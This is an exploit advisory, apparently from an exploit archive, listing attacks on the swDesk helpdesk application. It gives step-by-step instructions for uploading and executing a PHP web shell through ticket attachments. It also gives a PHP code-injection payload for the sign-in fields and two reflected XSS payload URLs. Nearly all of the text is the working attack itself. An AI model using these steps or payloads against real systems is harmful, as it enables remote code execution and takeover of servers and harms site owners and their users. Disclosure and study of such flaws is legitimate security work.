29 lines
No EOL
1.3 KiB
Text
29 lines
No EOL
1.3 KiB
Text
#
|
|
# Title : swDesk Multi Vulnerability
|
|
# Author : Red Security TEAM
|
|
# Date : 01/02/2012
|
|
# Risk : High
|
|
# Vendor : http://www.swdesk.com/
|
|
# Tested On : Apache
|
|
# Contact : Info [ 4t ] RedSecurity [ d0t ] COM
|
|
# Home : http://RedSecurity.COM
|
|
#
|
|
# Exploit :
|
|
#
|
|
# I. Arbitrary File Upload Vulnerability
|
|
# 1. Go to http://server/create_ticket.php
|
|
# 2. Fil all Input Fields And Click on Submit Ticket
|
|
# 3. Click on the View Ticket and you should go to the link Like : http://server/view_ticket.php?email=[Your Email]&id=1
|
|
# 4. You see Send Message box , Write any thing there and attach your PHP file in the Upload attachment and Click on Send Message
|
|
# 5. You can see your attachment above Like : Attachment: shell.php , Click on it and you see your PHP code has been runed ;)
|
|
#
|
|
# II. PHP Code Injection Vulnerability
|
|
# 1. Go to http://server/signin.php : Vulnerability Input Fields : email , password
|
|
# 2. Write your php in Input Fields Like : phpi${@print(RedSecurityTEAM)}
|
|
#
|
|
# III. XSS Vulnerability
|
|
# 1. http://server/view_ticket.php?email=example@example.com&id=" onmouseover=alert(1) bad="
|
|
# 2. http://server/kb_search.php?keywords=" onmouseover=alert(1) bad="&mode=Search
|
|
#
|
|
# Thanks To : http://1337day.com/ , http://www.exploit-db.com/ , http://securityreason.com/ , http://packetstormsecurity.org/
|
|
# |